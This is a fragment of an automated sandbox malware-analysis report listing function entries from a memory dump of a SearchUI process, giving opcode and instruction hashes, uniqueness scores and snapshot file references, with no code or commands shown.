                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction ID: d14cea32b36c488fa82ebeb0fb8ecae297e5288c065aef7d9a57dc8775ba374e
                                                                              • Opcode Fuzzy Hash: 7c6dfc9eb80bd846733bc46e0117a55f1602e8e5786ef04382f1fdcc8e35f73a
                                                                              • Instruction Fuzzy Hash: 029002544A540665D41455920C551EC60916388390FD544C0581681144DB4D02D62592
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600128, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 000001B142600130, Relevance: .0, Instructions: 5COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000011.00000002.707296466.000001B142600000.00000020.00000001.sdmp, Offset: 000001B142600000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_17_2_1b142600000_SearchUI.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction ID: d0026a21db09d335d4d114523f8ec1f797e4d2cfdc318b1afe64fccab26178ab
                                                                              • Opcode Fuzzy Hash: d3af01b4a0aee24f8b7f36251e41fc7bc37c5b6f8ad56a5dc8a2a700052fc0e6
                                                                              • Instruction Fuzzy Hash: 829002544A540665D41451910C552DC60516388354FD544818C1690144DB4D02D63192
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions